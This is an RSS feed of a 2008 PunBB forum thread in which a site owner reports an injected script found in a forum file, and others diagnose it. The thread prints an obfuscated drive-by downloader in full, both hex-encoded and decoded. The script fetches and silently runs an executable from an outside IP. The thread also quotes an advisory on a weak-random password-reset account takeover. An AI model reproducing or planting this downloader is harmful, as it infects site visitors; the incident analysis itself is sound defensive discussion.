<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<title><![CDATA[PunBB Forums — 1.2.16 hacked...]]></title>
		<link>https://punbb.informer.com/forums/topic/19302/1216-hacked/</link>
		<atom:link href="https://punbb.informer.com/forums/feed/rss/topic/19302/" rel="self" type="application/rss+xml" />
		<description><![CDATA[The most recent posts in 1.2.16 hacked....]]></description>
		<lastBuildDate>Mon, 16 Jun 2008 07:03:07 +0000</lastBuildDate>
		<generator>PunBB</generator>
		<item>
			<title><![CDATA[Re: 1.2.16 hacked...]]></title>
			<link>https://punbb.informer.com/forums/post/115495/#p115495</link>
			<description><![CDATA[<p>Your computer is possibly infected by a <a href="http://www.avertlabs.com/research/blog/index.php/2008/04/29/password-stealing-trojan-with-dash-of-ftp-and-a-hint-of-parasite/">password stealing Trojan</a>.<br /><a href="http://w3net.eu/2007/08/05/what-is-this-o-scriptdocumentwrite-mysterious-code-block-in-some-web-sites-source-code/">Here is the story</a> of such an infection.</p>]]></description>
			<author><![CDATA[null@example.com (Anatoly)]]></author>
			<pubDate>Mon, 16 Jun 2008 07:03:07 +0000</pubDate>
			<guid>https://punbb.informer.com/forums/post/115495/#p115495</guid>
		</item>
		<item>
			<title><![CDATA[Re: 1.2.16 hacked...]]></title>
			<link>https://punbb.informer.com/forums/post/115417/#p115417</link>
			<description><![CDATA[<div class="quotebox"><cite>Reines wrote:</cite><blockquote><div class="quotebox"><cite>HOLLYWOOD wrote:</cite><blockquote><p>It&#039;s likely the way that the hacker achieved Admin access to the forum.</p></blockquote></div><p>You would need more than admin access to the forum, to edit the lang/language/index.html file.</p></blockquote></div><p>FTP access.</p>]]></description>
			<author><![CDATA[null@example.com (Synvester)]]></author>
			<pubDate>Thu, 12 Jun 2008 11:57:50 +0000</pubDate>
			<guid>https://punbb.informer.com/forums/post/115417/#p115417</guid>
		</item>
		<item>
			<title><![CDATA[Re: 1.2.16 hacked...]]></title>
			<link>https://punbb.informer.com/forums/post/115416/#p115416</link>
			<description><![CDATA[<div class="quotebox"><cite>HOLLYWOOD wrote:</cite><blockquote><p>It&#039;s likely the way that the hacker achieved Admin access to the forum.</p></blockquote></div><p>You would need more than admin access to the forum, to edit the lang/language/index.html file.</p>]]></description>
			<author><![CDATA[null@example.com (Reines)]]></author>
			<pubDate>Thu, 12 Jun 2008 11:30:08 +0000</pubDate>
			<guid>https://punbb.informer.com/forums/post/115416/#p115416</guid>
		</item>
		<item>
			<title><![CDATA[Re: 1.2.16 hacked...]]></title>
			<link>https://punbb.informer.com/forums/post/115414/#p115414</link>
			<description><![CDATA[<p>There is a large hole in PunBB 1.2.16 in the forgotten password script.</p><div class="quotebox"><blockquote><p>Application: PunBB &lt;= 1.2.16<br />Severity: Weak random numbers lead to a blind password recovery vulnerability that allows account takeover<br />Risk: High<br />Vendor Status: Vendor has released PunBB 1.2.17 which fixes this issue. (Make sure you update ASAP if you haven&#039;t yet...)</p><br /><p>Overview:</p><p>&nbsp; &nbsp;Quote from <a href="http://punbb.org/">http://punbb.org/</a><br />&nbsp; &nbsp;&quot;PunBB is a fast and lightweight PHP-powered discussion board.<br />&nbsp; &nbsp; It is released under the GNU General Public License. Its primary<br />&nbsp; &nbsp; goals are to be faster, smaller and less graphically intensive as<br />&nbsp; &nbsp; compared to other discussion boards. PunBB has fewer features<br />&nbsp; &nbsp; than many other discussion boards, but is generally faster and<br />&nbsp; &nbsp; outputs smaller, semantically correct XHTML-compliant pages.&quot;</p><p>&nbsp; &nbsp;PunBB comes with a password reset feature that allows resetting a<br />&nbsp; &nbsp;forgotten password. When a password reset is requested an email <br />&nbsp; &nbsp;is sent to the user containing a new random password and an<br />&nbsp; &nbsp;activation link that needs to be visited in order for the password<br />&nbsp; &nbsp;change to become effective.<br />&nbsp; &nbsp;<br />&nbsp; &nbsp;Unfortunately it is possible due to several weak random numbers <br />&nbsp; &nbsp;to determine the new random password and the activation link<br />&nbsp; &nbsp;from the outside. This allows taking over any account on the<br />&nbsp; &nbsp;forum including the administrator account.<br />&nbsp; &nbsp;</p><p>Details:</p><p>&nbsp; &nbsp;PunBB&#039;s password reset functionality uses internally mt_rand() to <br />&nbsp; &nbsp;generate a new password and a new activation link that are both<br />&nbsp; &nbsp;send to the user by email.<br />&nbsp; &nbsp;<br />&nbsp; &nbsp;Unfortunately PunBB initialises the mersenne twister random number<br />&nbsp; &nbsp;generator on every request with a number between 0 and 1.000.000,<br />&nbsp; &nbsp;depending on the current microsecond. This means there are only<br />&nbsp; &nbsp;one million possible new passwords and new activation links. It<br />&nbsp; &nbsp;would be possible to bruteforce this limited area, but the amount <br />&nbsp; &nbsp;of time and traffic that would be required is huge.<br />&nbsp; &nbsp;<br />&nbsp; &nbsp;Because of this a better one shot solution was developed that <br />&nbsp; &nbsp;allows to determine the new password and the new activation link<br />&nbsp; &nbsp;from the result of the request that triggered the password reset.<br />&nbsp; &nbsp;<br />&nbsp; &nbsp;To understand how this is possible it is necessary to know that<br />&nbsp; &nbsp;during the installation PunBB creates a &quot;random&quot; cookie seed that<br />&nbsp; &nbsp;is used to store login data in the cookie during a visit. This<br />&nbsp; &nbsp;cookie seed generation is not really random, because it is more<br />&nbsp; &nbsp;or less the MD5 hash of the current timestamp. This means it is<br />&nbsp; &nbsp;easily bruteforceable when the attacker has his own user account<br />&nbsp; &nbsp;at the forum. He just needs to use his own login cookie and then<br />&nbsp; &nbsp;check all seconds backwards from the date the admin account was <br />&nbsp; &nbsp;created (see in memberlist).</p><p>&nbsp; &nbsp;The second component required for the attack to work is PunBB&#039;s<br />&nbsp; &nbsp;habit to return a cookie with a randomly generated password, when<br />&nbsp; &nbsp;it receives a wrong login cookie. Because the cookie seed is known<br />&nbsp; &nbsp;it can be used to check which one of the one million possible <br />&nbsp; &nbsp;passwords was generated. By knowing the password we know the <br />&nbsp; &nbsp;seed used in the call to mt_srand() which lets us predict all<br />&nbsp; &nbsp;random numbers during the request.<br />&nbsp; &nbsp;<br />&nbsp; &nbsp;It should be obvious that using this attack on the request that<br />&nbsp; &nbsp;triggers the password reset allows to blindly determine the new<br />&nbsp; &nbsp;password and the new activation link in a few seconds. Both can<br />&nbsp; &nbsp;then be used to takeover the attacked account.<br />&nbsp; &nbsp;</p><p>Proof of Concept:</p><p>&nbsp; &nbsp;SektionEins GmbH is not going to release a proof of concept <br />&nbsp; &nbsp;exploit for this vulnerability.</p><br /><p>Disclosure Timeline:</p><p>&nbsp; &nbsp;15. February 2008 - Notified security@punbb.org<br />&nbsp; &nbsp;19. February 2008 - PunBB developers released PunBB 1.2.17<br />&nbsp; &nbsp;20. February 2008 - Public Disclosure<br />&nbsp; </p><p>Recommendation:</p><p>&nbsp; &nbsp;It is strongly recommended to upgrade to the latest version of<br />&nbsp; &nbsp;PunBB which also fixes additional vulnerabilities reported by<br />&nbsp; &nbsp;third parties.<br />&nbsp; &nbsp;<br />&nbsp; &nbsp;Grab your copy at:<br />&nbsp; &nbsp;<br />&nbsp; &nbsp;<a href="http://punbb.org/downloads.php">http://punbb.org/downloads.php</a></p></blockquote></div><p>It&#039;s likely the way that the hacker achieved Admin access to the forum.</p>]]></description>
			<author><![CDATA[null@example.com (HOLLYWOOD)]]></author>
			<pubDate>Thu, 12 Jun 2008 09:24:04 +0000</pubDate>
			<guid>https://punbb.informer.com/forums/post/115414/#p115414</guid>
		</item>
		<item>
			<title><![CDATA[Re: 1.2.16 hacked...]]></title>
			<link>https://punbb.informer.com/forums/post/115413/#p115413</link>
			<description><![CDATA[<p>I&#039;ve updated to the last version and I think it&#039;s solved.</p>]]></description>
			<author><![CDATA[null@example.com (fmimoso)]]></author>
			<pubDate>Thu, 12 Jun 2008 08:38:06 +0000</pubDate>
			<guid>https://punbb.informer.com/forums/post/115413/#p115413</guid>
		</item>
		<item>
			<title><![CDATA[Re: 1.2.16 hacked...]]></title>
			<link>https://punbb.informer.com/forums/post/115407/#p115407</link>
			<description><![CDATA[<p>seems the question is solved. did it work??</p>]]></description>
			<author><![CDATA[null@example.com (ceryt56)]]></author>
			<pubDate>Wed, 11 Jun 2008 23:39:47 +0000</pubDate>
			<guid>https://punbb.informer.com/forums/post/115407/#p115407</guid>
		</item>
		<item>
			<title><![CDATA[Re: 1.2.16 hacked...]]></title>
			<link>https://punbb.informer.com/forums/post/115385/#p115385</link>
			<description><![CDATA[<p>Thanks for your reply. <img src="https://punbb.informer.com/forums/img/smilies/smile.png" width="15" height="15" alt="smile" /></p><p>Risking abusing your goodwill, do you know how it got there?</p>]]></description>
			<author><![CDATA[null@example.com (fmimoso)]]></author>
			<pubDate>Wed, 11 Jun 2008 11:14:01 +0000</pubDate>
			<guid>https://punbb.informer.com/forums/post/115385/#p115385</guid>
		</item>
		<item>
			<title><![CDATA[Re: 1.2.16 hacked...]]></title>
			<link>https://punbb.informer.com/forums/post/115339/#p115339</link>
			<description><![CDATA[<p>Its a virus.</p><p>The code evaluates to:</p><p>&lt;scr(disabled)ipt language=&quot;VBScript&quot;&gt;</p><br /><p>&nbsp; &nbsp; on error resume next</p><p>&nbsp; &nbsp; mmmmdf = &quot;<a href="http://200.189.179.60/IExplorer.exe">http://200.189.179.60/IExplorer.exe</a>&quot;</p><p>&nbsp; &nbsp; z0=&quot;obj&quot;<br />&nbsp; &nbsp; z1=&quot;ect&quot;<br />&nbsp; &nbsp; zstr=z0&amp;z1</p><p>&nbsp; &nbsp; s0=&quot;clas&quot;<br />&nbsp; &nbsp; s1=&quot;sid&quot;<br />&nbsp; &nbsp; sstr=s0+s1</p><p>&nbsp; &nbsp; r0=&quot;Micro&quot;<br />&nbsp; &nbsp; r1=&quot;soft.&quot;<br />&nbsp; &nbsp; r2=&quot;XML&quot;<br />&nbsp; &nbsp; r3=&quot;HTTP&quot;<br />&nbsp; &nbsp; rrstr=r0&amp;r1&amp;r2&amp;r3</p><p>&nbsp; &nbsp; t0=&quot;clsid:BD96C556-65A3-&quot;<br />&nbsp; &nbsp; t1=&quot;11D0-983A-00C04FC29E36&quot;<br />&nbsp; &nbsp; tsstr=t0&amp;t1</p><p>&nbsp; &nbsp; Set sdddw = document.createElement(zstr)<br />&nbsp; &nbsp; sdddw.setAttribute sstr, tsstr<br />&nbsp; &nbsp; str=rrstr<br />&nbsp; &nbsp; Set edd = sdddw.CreateObject(str,&quot;&quot;)</p><p>&nbsp; &nbsp; ba1=&quot;Ado&quot;<br />&nbsp; &nbsp; ba2=&quot;db.&quot;<br />&nbsp; &nbsp; ba3=&quot;Str&quot;<br />&nbsp; &nbsp; ba4=&quot;eam&quot;<br />&nbsp; &nbsp; str33=ba1&amp;ba2&amp;ba3&amp;ba4<br />&nbsp; &nbsp; straa=str33<br />&nbsp; &nbsp; set cccc = sdddw.createobject(straa,&quot;&quot;)<br />&nbsp; &nbsp; cccc.type = 1</p><p>&nbsp; &nbsp; str6=&quot;GET&quot;<br />&nbsp; &nbsp; edd.Open str6, mmmmdf, False<br />&nbsp; &nbsp; edd.Send</p><p>&nbsp; &nbsp; fr0=&quot;Scripti&quot;<br />&nbsp; &nbsp; fr1=&quot;ng.FileSy&quot;<br />&nbsp; &nbsp; fr2=&quot;stemObject&quot;<br />&nbsp; &nbsp; frstr=fr0&amp;fr1&amp;fr2</p><p>&nbsp; &nbsp; eeeedff=&quot;IExplorer.exe&quot;<br />&nbsp; &nbsp; set vvvv = sdddw.createobject(frstr,&quot;&quot;)<br />&nbsp; &nbsp; set tmp = vvvv.GetSpecialFolder(2) <br />&nbsp; &nbsp; eeeedff= vvvv.BuildPath(tmp,eeeedff)<br />&nbsp; &nbsp; cccc.open</p><p>&nbsp; &nbsp; cccc.write edd.responseBody</p><p>&nbsp; &nbsp; cccc.savetofile eeeedff,2</p><p>&nbsp; &nbsp; gtg0=&quot;Shell.Ap&quot;<br />&nbsp; &nbsp; gtg1=&quot;plication&quot;<br />&nbsp; &nbsp; gtrrstr=gtg0&amp;gtg1</p><p>&nbsp; &nbsp; cccc.close<br />&nbsp; &nbsp; set xxsdd = sdddw.createobject(gtrrstr,&quot;&quot;)<br />&nbsp; &nbsp; xxsdd.ShellExecute eeeedff,&quot;&quot;,&quot;&quot;,&quot;open&quot;,0</p><p>&nbsp; &nbsp; </p><p>&nbsp; &nbsp; &lt;/script&gt;</p><p>which seems to download a virus of some sort and try to run it on your computer. It would only affect IE AFAIK, no one in their right mind would have IE&#039;s security settings on &quot;ultra-low&quot;.</p>]]></description>
			<author><![CDATA[null@example.com (izzy)]]></author>
			<pubDate>Sat, 07 Jun 2008 02:55:38 +0000</pubDate>
			<guid>https://punbb.informer.com/forums/post/115339/#p115339</guid>
		</item>
		<item>
			<title><![CDATA[1.2.16 hacked...]]></title>
			<link>https://punbb.informer.com/forums/post/115338/#p115338</link>
			<description><![CDATA[<p>I have 1.2.16 installed.</p><p>My lang/language/index.html file is infected with something like this:</p><div class="codebox"><pre><code>&lt;Script Language=&#039;Javascript&#039;&gt;
document.write(unescape(&#039;%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%56%42%53%63%72%69%70%74%22%3E%0D%0A%0D%0A%20%20%20%20%6F%6E%20%65%72%72%6F%72%20%72%65%73%75%6D%65%20%6E%65%78%74%0D%0A%0D%0A%20%20%20%20%6D%6D%6D%6D%64%66%20%3D%20%22%68%74%74%70%3A%2F%2F%32%30%30%2E%31%38%39%2E%31%37%39%2E%36%30%2F%49%45%78%70%6C%6F%72%65%72%2E%65%78%65%22%0D%0A%0D%0A%20%20%20%20%7A%30%3D%22%6F%62%6A%22%0D%0A%20%20%20%20%7A%31%3D%22%65%63%74%22%0D%0A%20%20%20%20%7A%73%74%72%3D%7A%30%26%7A%31%0D%0A%0D%0A%20%20%20%20%73%30%3D%22%63%6C%61%73%22%0D%0A%20%20%20%20%73%31%3D%22%73%69%64%22%0D%0A%20%20%20%20%73%73%74%72%3D%73%30%2B%73%31%0D%0A%0D%0A%20%20%20%20%72%30%3D%22%4D%69%63%72%6F%22%0D%0A%20%20%20%20%72%31%3D%22%73%6F%66%74%2E%22%0D%0A%20%20%20%20%72%32%3D%22%58%4D%4C%22%0D%0A%20%20%20%20%72%33%3D%22%48%54%54%50%22%0D%0A%20%20%20%20%72%72%73%74%72%3D%72%30%26%72%31%26%72%32%26%72%33%0D%0A%0D%0A%20%20%20%20%74%30%3D%22%63%6C%73%69%64%3A%42%44%39%36%43%35%35%36%2D%36%35%41%33%2D%22%0D%0A%20%20%20%20%74%31%3D%22%31%31%44%30%2D%39%38%33%41%2D%30%30%43%30%34%46%43%32%39%45%33%36%22%0D%0A%20%20%20%20%74%73%73%74%72%3D%74%30%26%74%31%0D%0A%0D%0A%20%20%20%20%53%65%74%20%73%64%64%64%77%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%7A%73%74%72%29%0D%0A%20%20%20%20%73%64%64%64%77%2E%73%65%74%41%74%74%72%69%62%75%74%65%20%73%73%74%72%2C%20%74%73%73%74%72%0D%0A%20%20%20%20%73%74%72%3D%72%72%73%74%72%0D%0A%20%20%20%20%53%65%74%20%65%64%64%20%3D%20%73%64%64%64%77%2E%43%72%65%61%74%65%4F%62%6A%65%63%74%28%73%74%72%2C%22%22%29%0D%0A%0D%0A%20%20%20%20%62%61%31%3D%22%41%64%6F%22%0D%0A%20%20%20%20%62%61%32%3D%22%64%62%2E%22%0D%0A%20%20%20%20%62%61%33%3D%22%53%74%72%22%0D%0A%20%20%20%20%62%61%34%3D%22%65%61%6D%22%0D%0A%20%20%20%20%73%74%72%33%33%3D%62%61%31%26%62%61%32%26%62%61%33%26%62%61%34%0D%0A%20%20%20%20%73%74%72%61%61%3D%73%74%72%33%33%0D%0A%20%20%20%20%73%65%74%20%63%63%63%63%20%3D%20%73%64%64%64%77%2E%63%72%65%61%74%65%6F%62%6A%65%63%74%28%73%74%72%61%61%2C%22%22%29%0D%0A%20%20%20%20%63%63%63%63%2E%74%79%70%65%20%3D%20%31%0D%0A%0D%0A%20%20%20%20%73%74%72%36%3D%22%47%45%54%22%0D%0A%20%20%20%20%65%64%64%2E%4F%70%65%6E%20%73%74%72%36%2C%20%6D%6D%6D%6D%64%66%2C%20%46%61%6C%73%65%0D%0A%20%20%20%20%65%64%64%2E%53%65%6E%64%0D%0A%0D%0A%20%20%20%20%66%72%30%3D%22%53%63%72%69%70%74%69%22%0D%0A%20%20%20%20%66%72%31%3D%22%6E%67%2E%46%69%6C%65%53%79%22%0D%0A%20%20%20%20%66%72%32%3D%22%73%74%65%6D%4F%62%6A%65%63%74%22%0D%0A%20%20%20%20%66%72%73%74%72%3D%66%72%30%26%66%72%31%26%66%72%32%0D%0A%0D%0A%20%20%20%20%65%65%65%65%64%66%66%3D%22%49%45%78%70%6C%6F%72%65%72%2E%65%78%65%22%0D%0A%20%20%20%20%73%65%74%20%76%76%76%76%20%3D%20%73%64%64%64%77%2E%63%72%65%61%74%65%6F%62%6A%65%63%74%28%66%72%73%74%72%2C%22%22%29%0D%0A%20%20%20%20%73%65%74%20%74%6D%70%20%3D%20%76%76%76%76%2E%47%65%74%53%70%65%63%69%61%6C%46%6F%6C%64%65%72%28%32%29%20%0D%0A%20%20%20%20%65%65%65%65%64%66%66%3D%20%76%76%76%76%2E%42%75%69%6C%64%50%61%74%68%28%74%6D%70%2C%65%65%65%65%64%66%66%29%0D%0A%20%20%20%20%63%63%63%63%2E%6F%70%65%6E%0D%0A%0D%0A%20%20%20%20%63%63%63%63%2E%77%72%69%74%65%20%65%64%64%2E%72%65%73%70%6F%6E%73%65%42%6F%64%79%0D%0A%0D%0A%20%20%20%20%63%63%63%63%2E%73%61%76%65%74%6F%66%69%6C%65%20%65%65%65%65%64%66%66%2C%32%0D%0A%0D%0A%20%20%20%20%67%74%67%30%3D%22%53%68%65%6C%6C%2E%41%70%22%0D%0A%20%20%20%20%67%74%67%31%3D%22%70%6C%69%63%61%74%69%6F%6E%22%0D%0A%20%20%20%20%67%74%72%72%73%74%72%3D%67%74%67%30%26%67%74%67%31%0D%0A%0D%0A%20%20%20%20%63%63%63%63%2E%63%6C%6F%73%65%0D%0A%20%20%20%20%73%65%74%20%78%78%73%64%64%20%3D%20%73%64%64%64%77%2E%63%72%65%61%74%65%6F%62%6A%65%63%74%28%67%74%72%72%73%74%72%2C%22%22%29%0D%0A%20%20%20%20%78%78%73%64%64%2E%53%68%65%6C%6C%45%78%65%63%75%74%65%20%65%65%65%65%64%66%66%2C%22%22%2C%22%22%2C%22%6F%70%65%6E%22%2C%30%0D%0A%0D%0A%20%20%20%20%0D%0A%0D%0A%20%20%20%20%3C%2F%73%63%72%69%70%74%3E&#039;));
&lt;/Script&gt;</code></pre></div><p>I know I should&#039;ve upgraded to a new version, but, considering the harm done, my question is: is this flaw already corrected in the new versions?</p><p>If so, what harm could/did this code do?</p><p>Thanks. <img src="https://punbb.informer.com/forums/img/smilies/smile.png" width="15" height="15" alt="smile" /></p>]]></description>
			<author><![CDATA[null@example.com (fmimoso)]]></author>
			<pubDate>Sat, 07 Jun 2008 01:50:01 +0000</pubDate>
			<guid>https://punbb.informer.com/forums/post/115338/#p115338</guid>
		</item>
	</channel>
</rss>
